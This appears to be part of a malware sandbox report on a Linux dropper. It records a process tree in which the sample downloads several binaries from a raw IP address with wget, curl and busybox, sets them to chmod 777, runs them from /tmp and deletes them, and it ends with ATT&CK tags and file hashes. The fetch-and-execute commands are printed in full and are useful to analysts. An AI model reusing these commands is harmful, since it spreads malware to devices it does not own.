/bin/busybox/bin/busybox wget http://87.120.84.230/bins/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵PID:1632
-
-
/bin/chmodchmod 777 hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵
- File and Directory Permissions Modification
PID:1635
-
-
/tmp/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE./hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵
- Executes dropped EXE
PID:1636
-
-
/bin/rmrm hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵PID:1637
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵PID:1638
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵
- Writes file to tmp directory
PID:1639
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵PID:1640
-
-
/bin/chmodchmod 777 7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵
- File and Directory Permissions Modification
PID:1641
-
-
/tmp/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX./7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵
- Executes dropped EXE
PID:1642
-
-
/bin/rmrm 7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵PID:1643
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵PID:1644
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵
- Writes file to tmp directory
PID:1645
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵PID:1646
-
-
/bin/chmodchmod 777 MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵
- File and Directory Permissions Modification
PID:1647
-
-
/tmp/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk./MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵
- Executes dropped EXE
PID:1648
-
-
/bin/rmrm MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵PID:1649
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- System Network Configuration Discovery
PID:1650
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1651
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- System Network Configuration Discovery
PID:1652
-
-
/bin/chmodchmod 777 eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- File and Directory Permissions Modification
PID:1653
-
-
/tmp/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN./eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1654
-
-
/bin/rmrm eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- System Network Configuration Discovery
PID:1655
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵PID:1656
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵
- Writes file to tmp directory
PID:1657
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵PID:1658
-
-
/bin/chmodchmod 777 g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵
- File and Directory Permissions Modification
PID:1659
-
-
/tmp/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p./g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵
- Executes dropped EXE
PID:1660
-
-
/bin/rmrm g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵PID:1661
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵PID:1662
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵
- Writes file to tmp directory
PID:1663
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵PID:1664
-
-
/bin/chmodchmod 777 qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵
- File and Directory Permissions Modification
PID:1665
-
-
/tmp/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD1./qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵
- Executes dropped EXE
PID:1666
-
-
/bin/rmrm qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵PID:1667
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵PID:1668
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵
- Writes file to tmp directory
PID:1669
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵PID:1670
-
-
/bin/chmodchmod 777 tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵
- File and Directory Permissions Modification
PID:1671
-
-
/tmp/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd./tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵
- Executes dropped EXE
PID:1672
-
-
/bin/rmrm tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵PID:1673
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97